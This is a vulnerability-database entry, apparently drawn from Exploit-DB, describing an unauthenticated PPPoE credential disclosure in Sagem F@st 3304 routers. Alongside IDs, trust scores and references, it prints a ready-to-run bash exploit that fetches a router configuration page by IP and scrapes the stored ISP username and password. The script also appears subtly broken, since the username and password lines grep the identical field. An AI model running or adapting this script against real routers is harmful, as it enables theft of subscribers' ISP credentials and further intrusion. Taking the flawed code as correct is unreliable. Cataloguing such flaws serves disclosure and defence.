ID

VAR-E-201107-0202


EDB ID

35997


TITLE

Sagem F@st 3304 Routers - PPPoE Credentials Information Disclosure - Hardware remote Exploit

Trust: 0.6

sources: EXPLOIT-DB: 35997

DESCRIPTION

Sagem F@st 3304 Routers - PPPoE Credentials Information Disclosure.. remote exploit for Hardware platform

Trust: 0.6

sources: EXPLOIT-DB: 35997

AFFECTED PRODUCTS

vendor:sagemmodel:f@st routersscope:eqversion:3304

Trust: 1.0

vendor:sagemmodel:f@stscope:eqversion:33040

Trust: 0.3

sources: BID: 48908 // EXPLOIT-DB: 35997

EXPLOIT

source: https://www.securityfocus.com/bid/48908/info

Sagem F@st 3304 router is prone to a remote information-disclosure vulnerability because it fails to restrict access to sensitive information.

A remote attacker exploit this issue to obtain sensitive information, possibly aiding in further attacks.

#!/bin/bash
#########################################
# Exploit Title: Sagem 3304 Routers Get PPPOE Password
# Date 27/07/2011
# Author: securititracker@gmail.com
# Software Link: null
# Version: Sagem Routers F@st 3304
# Tested on: Sagem F@ST 3304
#
#########################################

Usage()
{
echo "Usage : $0 IP_ADDRESS"
}
if [ "$1" != "" ]
then
IP_ADDRESS="$1"
else
Usage
exit 1
fi

USER_NAME=`wget http://$IP_ADDRESS/quickconfname_ADSL.html -t 1 -q -O - | grep "msg051" | tr " " "\n" | grep value | tr -d \\ |tr -d "\"" | awk -F= '{print($2)}' `

USER_PASSWORD=`wget http://$IP_ADDRESS/quickconfname_ADSL.html -t 1 -q -O - | grep "msg051" | tr " " "\n" | grep value | tr -d \\ |tr -d "\"" | awk -F= '{print($2)}' `

echo "Username = $USER_NAME ; Passsword = $USER_PASSWORD"

Trust: 1.0

sources: EXPLOIT-DB: 35997

EXPLOIT LANGUAGE

sh

Trust: 0.6

sources: EXPLOIT-DB: 35997

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 35997

TYPE

PPPoE Credentials Information Disclosure

Trust: 1.0

sources: EXPLOIT-DB: 35997

CREDITS

securititracker

Trust: 0.6

sources: EXPLOIT-DB: 35997

EXTERNAL IDS

db:EXPLOIT-DBid:35997

Trust: 1.9

db:BIDid:48908

Trust: 1.9

db:EDBNETid:57372

Trust: 0.6

sources: BID: 48908 // EXPLOIT-DB: 35997 // EDBNET: 57372

REFERENCES

url:https://www.securityfocus.com/bid/48908/info

Trust: 1.0

url:https://www.exploit-db.com/exploits/35997/

Trust: 0.6

url:http://www.sagem.com/

Trust: 0.3

url:https://www.exploit-db.com/exploits/35997

Trust: 0.3

sources: BID: 48908 // EXPLOIT-DB: 35997 // EDBNET: 57372

SOURCES

db:BIDid:48908
db:EXPLOIT-DBid:35997
db:EDBNETid:57372

LAST UPDATE DATE

2022-07-27T09:22:18.632000+00:00


SOURCES UPDATE DATE

db:BIDid:48908date:2011-07-27T00:00:00

SOURCES RELEASE DATE

db:BIDid:48908date:2011-07-27T00:00:00
db:EXPLOIT-DBid:35997date:2011-07-27T00:00:00
db:EDBNETid:57372date:2011-07-27T00:00:00